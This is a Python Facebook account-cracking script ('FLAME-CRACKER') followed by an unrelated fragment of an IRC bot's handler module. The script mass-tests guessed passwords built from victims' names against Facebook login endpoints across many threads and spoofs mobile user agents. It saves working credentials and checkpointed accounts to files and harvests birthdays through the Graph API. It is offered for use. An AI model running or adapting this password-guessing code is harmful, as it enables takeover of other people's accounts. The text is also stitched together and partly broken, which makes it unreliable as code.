uas_tes = "Mozilla/5.0 (Linux; Android 6.0.1; 12; en-us; 10; T-Mobile myTouch 3G Slide Build/GRI40)I148V)I223F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9980.0.4304.147 Mobile Safari/533.1 OPR/51.1.2461.137501"
uas_nokia5plus = "Mozilla/5.0 (Linux; Android 10; Nokia 5.1 Plus Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36"
uas_random2 = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
P = '\x1b[1;97m' # PUTIH
M = '\033[0;91m' # MERAH
H = '\033[1;92m' # HIJAU
K = '\033[1;91m' # KUNING
B = '\033[0;94m' # BIRU
U = '\033[0;95m' # UNGU
O = '\033[0;96m' # BIRU MUDA
N = '\033[0m' # WARNA MATI
def login():
os.system("rm -rf access_token.txt");logo()
tok = input(' [*] Enter Your Token : ')
try:
u = requests.get('https://graph.facebook.com/me?access_token='+tok).text
u1 = json.loads(u)
name = u1['name']
ts = open('access_token.txt', 'w')
ts.write(tok)
ts.close()
print("\n\n[*] Login Successful as " + name )
time.sleep(1)
readline___Public_Xml()
except KeyError:
print('\n\n[*] Token Expired ')
time.sleep(1)
login()
def banner():
logo()
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
flame_naim('\n\n\033[0m The Prosess Done...')
flame_naim('\n\033[1;92mTotal OK : %s • Total CP : %s'%(str(len(ok)),str(len(cp))));exit()
#flame_naim('\033[1;91mCHECK > %s'%(str(len(cp))));exit()
else:
flame_naim('\n\033[0mUps..Tidak Mendapatkan Hasil')
exit()
class __crack__:
def __init__(self):
self.id = []
def plerr(self):
try:
self.apk = input(" [*] File Name : ")
print (' [*]=============================================')
self.id = naim4(self.apk).read().splitlines()
flame_naim(' [*] Total ID : %s'%(len(self.id)))
print (' [✓] Are You Went To Continue : Type Y')
except:
flame_naim('\n [!] File Not Found In Storage')
input('\n [*] Press Enter To Back');readline___Public_Xml();print("[M] Menual Password ");print('[D] Default Password ')
_jokowi_kontol_ = input(" [*] Choose : ")
if _jokowi_kontol_ in ('M', 'm'):
print('[*] Function Added in new update ')
flame_naim('\nEnter Password 123456 or 123456789 For OLd Idz ')
while True:
pwek = input('\nEnter Password : ')
#flame_naim('Sandi > %s'%(pwek))
if pwek == '':
flame_naim('\nJangan Kosong')
time.sleep(1)
exit()
elif len(pwek)<=5:
flame_naim('\nSandi Harus 6 Karakter Lebih Tidak Masalah')
else:
def _sempak_(bse=None):
boy = input('\nPilih : ')
if boy == '':
flame_naim('\nJangan Kosong')
time.sleep(1);self._sempak_()
elif boy == "1" or boy == "01":
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=35) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__api__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
elif boy == "2" or boy == "02":
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=25) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__mbasic__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
elif boy == "3" or boy == "03":
flame_naim('\nHasil RESULTS Tersimpan Di > multiresuts.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=20) as (_ngentot_gratis_):
for ikeh in self.id:
try:
kimochi = ikeh.split('|')[0]
_ngentot_gratis_.submit(self.__mfb,__, kimochi, bse)
except: pass
os.remove(self.apk)
hasil(ok,cp)
else:
#flame_naim('\nSalah')
exit()
#flame_naim('\n\t PILIH METODE CRACK NYA')
flame_naim('\n01.) Metode b-api ')
flame_naim('02.) Metode mbasic ')
flame_naim('03.) Metode Mobile ')
_sempak_(pwek.split(','))
break
elif _jokowi_kontol_ in ('Y', 'y'):
print (' [*]=============================================')
flame_naim('\n\t------[ Method Crack ]-----')
print (' [*]=============================================')
flame_naim(' [1] METODE B-API')
flame_naim(' [2] METODE MBASIC [ Pro ]')
flame_naim(' [3] METODE MOBILE ')
print (' [*]=============================================')
self.__pler__()
else:
#flame_naim('\nLu kok kayak jmbt ya?')
exit()
return
def __api__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s'%(loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
ua_vivo = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
p = Prof_naim("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+user+"&locale=en_US&password="+pw+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6").json()
if "access_token" in p:
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s%s '%(user,pw,tahun(user)))
wrt = '%s - %s %s'%(user,pw,tahun(user))
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif "www.facebook.com" in p["error_msg"]:
try:
token = naim4('login.txt').read()
cp_ttl = Prof_naim('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s • %s %s %s%s '%(user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s%s'% (user,pw,day,month,year,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s%s '%(user,pw,tahun(user)))
wrt = '%s - %s%s' % (user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __mbasic__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s '%(loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
ua_vivo = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ses = requests.Session()
headers_ = {"Host":"mbasic.facebook.com","upgrade-insecure-requests":"1","user-agent":"NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://mbasic.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
flame_naim('\r\033[1;32m[FLAME-NAIM-OK💉] %s | %s ' % (user,pw))
wrt = '%s - %s' % (user,pw)
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif 'checkpoint' in ses.cookies.get_dict():
try:
token = naim4('token.txt').read()
cp_ttl = Prof_naim('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;31m[FLAME-NAIM-CP🔒] %s | %s • %s %s %s%s ' % (user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s%s' % (user,pw,day,month,year,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;91m[FLAME-NAIM-CP🔒] %s | %s%s ' % (user,pw,tahun(user)))
wrt = '%s - %s%s'%(user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __mfb__(self, user, _sempak_):
global ok,cp,loop
sys.stdout.write('\r\033[1;97m[ FLAME-NAIM ] %s/%s \033[1;92mOK-:%s / \033[1;91mCP-:%s'%(loop,len(self.id),len(cp),len(ok))),
sys.stdout.flush()
for pw in _sempak_:
pw = pw.lower()
try: os.mkdir('')
except: pass
try:
user_agent = naim4('agent.txt', 'r').read()
except (KeyError, IOError):
user_agent=['Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.45 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/345.0.0.34.118;]','Mozilla/5.0 (Linux; Android 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]','Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36','Mozilla/5.0 (Linux; Android 12; LM-Q710(FGN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36']
ses = requests.Session()
headers_ = {"Host":"m.facebook.com","upgrade-insecure-requests":"1","user-agent":ua_vivo,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://m.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s '%(user,pw))
wrt = '%s - %s - %s' % (user,pw)
ok.append(wrt)
open('OK.txt','a').write('%s\n' % wrt)
break
continue
elif 'checkpoint' in ses.cookies.get_dict():
try:
token = naim4('token.txt').read()
cp_ttl = Prof_Aking('https://graph.facebook.com/%s?access_token=%s'%(user,token)).json()['birthday']
month, day, year = cp_ttl.split('/')
month = bulan_ttl[month]
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s %s %s %s%s ' % (user,pw,day,month,year,tahun(user)))
wrt = '%s - %s - %s %s %s'%(user,pw,day,month,year)
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
except (KeyError, IOError):
month = ''
day = ''
year = ''
except:
pass
flame_naim('\r\033[1;92m[FLAME-NAIM-OK💉] %s | %s%s ' % (user,pw,tahun(user)))
wrt = '%s - %s%s'%(user,pw,tahun(user))
cp.append(wrt)
open('CP.txt','a').write('%s\n' % wrt)
break
continue
loop += 1
def __pler__(self):
yan = input('\n[•] Choose : ')
if yan == '':
flame_naim('\nJangan Kosong')
exit()
elif yan in ('1', '01'):
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=35) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 2:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 3:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 4:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
_ngentot_gratis_.submit(self.__api__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
elif yan in ('2', '02'):
flame_naim('\n[•] Result OK saved to OK.txt')
flame_naim('[•] Result CP saved to CP.txt')
flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=25) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 2:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 3:
pwx = [name, xz[0]+xz[1]]
elif len(xz) == 4:
pwx = [name, xz[0]+xz[1]]
else:
pwx = [name, xz[0]+xz[1]]
_ngentot_gratis_.submit(self.__mbasic__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
elif yan in ('3', '03'):
#flame_naim('\n[•] Result OK saved to OK.txt')
#flame_naim('[•] Result CP saved to CP.txt')
#flame_naim('\n\tCrack Processing...\n')
flame_naim('\n\tCrack Processing...\n\n');logo()
with ThreadPoolExecutor(max_workers=20) as (_ngentot_gratis_):
for yntkts in self.id:
try:
uid, name = yntkts.split('|')
xz = name.split(' ')
if len(xz) == 1:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 2:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 3:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
elif len(xz) == 4:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
else:
pwx = [name, xz[0]+"123", xz[0]+"12345"]
_ngentot_gratis_.submit(self.__mfb__, uid, pwx)
except:
pass
os.remove(self.apk)
hasil(ok,cp)
else:
flame_naim('\nSalah')
time.sleep(1)
self.__pler__()
def tahun(fx):
if len(fx)==15:
if fx[:10] in ['1000000000'] :tahunz = ' '
elif fx[:9] in ['100000000'] :tahunz = ' '
elif fx[:8] in ['10000000'] :tahunz = ' '
elif fx[:7] in ['1000000','1000001','1000002','1000003','1000004','1000005']:tahunz = ' '
elif fx[:7] in ['1000006','1000007','1000008','1000009']:tahunz = ' '
elif fx[:6] in ['100001'] :tahunz = ' '
elif fx[:6] in ['100002','100003'] :tahunz = ' '
elif fx[:6] in ['100004'] :tahunz = ' '
elif fx[:6] in ['100005','100006'] :tahunz = ' '
elif fx[:6] in ['100007','100008'] :tahunz = ' '
elif fx[:6] in ['100009'] :tahunz = ' '
elif fx[:5] in ['10001'] :tahunz = ' '
elif fx[:5] in ['10002'] :tahunz = ' '
elif fx[:5] in ['10003'] :tahunz = ' '
elif fx[:5] in ['10004'] :tahunz = ' '
elif fx[:5] in ['10005'] :tahunz = ' '
elif fx[:5] in ['10006','10007','10008']:tahunz = ' '
else:tahunz=''
elif len(fx) in [9,10]:
tahunz = ' '
elif len(fx)==8:
tahunz = ' '
elif len(fx)==7:
tahunz = ' '
else:tahunz=''
return tahunz
if __name__=='__main__':
os.system("git pull")
flame_ua_xaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_nokia = 'nokiac3-00/5.0 (07.20) profile/midp-2.1 configuration/cldc-1.1 mozilla/5.0 applewebkit/420+ (khtml, like gecko) safari/420+'
flame_ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_huawei = 'Mozilla/5.0 (Linux; Android 8.1.0; HUAWEI Y7 PRIME 2019 Build/5887208) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_vivo = 'Mozilla/5.0 (Linux; Android 11; vivo 1918) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
flame_ua_samsung = 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]'
flame_ua_windows = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
banner="""
\033[1;32m## ## ### #### ## ##
### ## ## ## ## ### ###
#### ## ## ## ## #### ####
## ## ## ## ## ## ## ### ##
## #### ######### ## ## ##
## ### ## ## ## ## ##
## ## ## ## #### ## ##
╔════════════════════════════════════════╗
| \033[1;32m[*] \033[1;31mNAIM PRO FILE CLONER \033[1;32m[*] |
|════════════════════════════════════════|
| [*] AUTHOR > FLAME NAIM |
| [*] TOOLS > FLAME-CRACKER |
| [*] GITHUB > Naim75o |
| [*] FACEBOOK > FLAME NAIM |
╚════════════════════════════════════════╝
"""
ct = datetime.now()
n = ct.month
monthsx = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
urls="https://business.facebook.com/business_locations"
_ses=requests.Session()
def logo():
time.sleep(0.5)
os.system("clear")
print(banner)
print("")
time.sleep(0.5)
def convert(cok):
__for=(
'datr='+cok['datr']
)+';'+(
'c_user='+cok['c_user']
)+';'+(
'fr='+cok['fr']
)+';'+(
'xs='+cok['xs'] )
return __for
def sep():
os.system('clear')
logo()
try:
limit = int(input(' How many links do you want to separate? '))
except:
limit = 1
print ('\033[1;37m Example /sdcard/FLAME.txt')
file_name = input('\033[1;37m Input file name: ')
print ('\033[1;37m Example FLAME.txt')
new_save = input('\033[1;37m Save new file as: ')
y = 0
for k in range(limit):
y+=1
links = input(' Put links %s: '%(y))
os.system('cat '+file_name+' | grep "'+links+'" >> /sdcard/'+new_save)
print(50*'-')
print(' Links grabbed successfully')
print(' Total grabbed links: '+str(len(open('/sdcard/'+new_save).read().splitlines())))
print(' New file saved as: /sdcard/'+new_save)
print(50*'-')
input(' Press enter to back ')
readline___Public_Xml()
def dupcutter():
logo()
print("[*] File Duplicate Object Cutter - Auto Object ")
print("[*] Enter File Path / File Location \n\n")
naim4 = input('[->] File Path : ')
haider = input('[->] New File Save As : ')
os.system('touch ' +haider)
os.system('sort -r '+naim4+' | uniq > '+haider)
print("")
print("")
print(linesmall)
print("[*] Removing Successful From File " + naim4 )
print("[*] New File Save " + haider )
print(linesmall)
print("\n\n")
time.sleep(2)
if __name__=='__main__':
Subscraption()
mahdi() | PypiClean |
/CslBot-0.21-py3-none-any.whl/cslbot/helpers/handler.py |
import base64
import collections
import configparser
import copy
import logging
import random
import re
import threading
import time
from datetime import datetime, timedelta
from irc import client, modes
from typing import Callable, Dict # noqa
from . import acl, arguments, control, identity, misc, orm, registry, sql, textutils, workers
logger = logging.getLogger(__name__)
class BotHandler(object):
def __init__(self, config: configparser.ConfigParser, connection: client.ServerConnection, channels: Dict[str, str], confdir: str) -> None:
"""Set everything up.
| kick_enabled controls whether the bot will kick people or not.
| abuselist is a dict keeping track of how many times nicks have used
| rate-limited commands.
| modules is a dict containing the commands the bot supports.
| confdir is the path to the directory where the bot's config is stored.
| db - Is a db wrapper for data storage.
"""
self.connection = connection # type: client.ServerConnection
self.channels = channels
self.config = config # type: configparser.ConfigParser
self.db = sql.Sql(config, confdir) # type: sql.Sql
# FIXME: don't pass in self
self.workers = workers.Workers(self) # type: workers.Workers
self.guarded = [] # type: List[str]
self.voiced = collections.defaultdict(dict) # type: Dict[str,Dict[str,bool]]
self.opers = collections.defaultdict(dict) # type: Dict[str,Dict[str,bool]]
self.features = {'account-notify': False, 'extended-join': False, 'whox': False}
start = datetime.now()
self.uptime = {'start': start, 'reloaded': start}
self.abuselist = {} # type: Dict[str,Dict[str,datetime]]
self.ping_map = {} # type: Dict[str,str]
self.outputfilter = collections.defaultdict(list) # type: Dict[str,List[Callable[[str],str]]]
self.kick_enabled = True
self.who_map = {} # type: Dict[int,str]
self.flood_lock = threading.Lock()
self.data_lock = threading.RLock()
self.last_msg_time = datetime.now()
self.confdir = confdir
self.log_to_ctrlchan = False
def get_data(self):
"""Saves the handler's data for :func:`.reloader.do_reload`"""
data = {}
data['guarded'] = self.guarded[:]
data['voiced'] = copy.deepcopy(self.voiced)
data['opers'] = copy.deepcopy(self.opers)
data['features'] = self.features.copy()
data['uptime'] = self.uptime.copy()
data['abuselist'] = self.abuselist.copy()
data['who_map'] = self.who_map.copy()
return data
def set_data(self, data):
"""Called from :func:`.reloader.do_reload` to restore the handler's data."""
for key, val in data.items():
setattr(self, key, val)
self.uptime['reloaded'] = datetime.now()
def update_authstatus(self, nick):
if self.features['whox']:
tag = random.randint(0, 999)
self.who_map[tag] = nick
self.send_who(nick, tag)
elif self.config['feature']['servicestype'] == "ircservices":
self.rate_limited_send('privmsg', 'NickServ', 'STATUS %s' % nick)
elif self.config['feature']['servicestype'] == "atheme":
self.rate_limited_send('privmsg', 'NickServ', 'ACC %s' % nick)
def send_who(self, target, tag):
# http://faerion.sourceforge.net/doc/irc/whox.var
# n(show nicknames), a(show nickserv status), f(show channel status/modes), t(show tag)
self.rate_limited_send('who', '%s %%naft,%d' % (target, tag))
def is_admin(self, send, nick):
"""Checks if a nick is a admin.
If NickServ hasn't responded yet, then the admin is unverified,
so assume they aren't a admin.
"""
# Current roles are admin and owner, which is a superset of admin.
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == nick).first()
if admin is None:
return False
# no nickserv support, assume people are who they say they are.
if not self.config['feature'].getboolean('nickserv'):
return True
if not admin.registered:
self.update_authstatus(nick)
# We don't necessarily want to complain in all cases.
if send is not None:
send("Unverified admin: %s" % nick, target=self.config['core']['channel'])
return False
else:
if not self.features['account-notify']:
# reverify every 5min if we don't have the notification feature.
if datetime.now() - admin.time > timedelta(minutes=5):
self.update_authstatus(nick)
return True
def get_admins(self):
"""Check verification for all admins."""
# no nickserv support, assume people are who they say they are.
if not self.config['feature'].getboolean('nickserv'):
return
with self.db.session_scope() as session:
for a in session.query(orm.Permissions).all():
if not a.registered:
self.update_authstatus(a.nick)
def abusecheck(self, send, nick, target, limit, cmd):
""" Rate-limits commands.
| If a nick uses commands with the limit attr set, record the time
| at which they were used.
